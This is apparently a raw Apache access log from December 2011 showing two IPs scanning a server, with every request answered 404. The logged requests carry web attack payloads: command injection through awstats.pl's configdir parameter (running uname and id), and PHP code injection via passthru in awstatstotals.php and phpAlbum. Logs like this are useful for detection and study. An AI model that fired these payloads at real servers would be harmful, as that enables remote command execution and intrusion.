80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
80.248.214.103 - - [04/Dec/2011:12:40:01 +0100] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:33 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:34 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:34 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:35 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:36 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 507 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:36 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:37 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:39 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:39 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:40 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:41 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 505 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
60.250.15.2 - - [04/Dec/2011:13:47:41 +0100] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
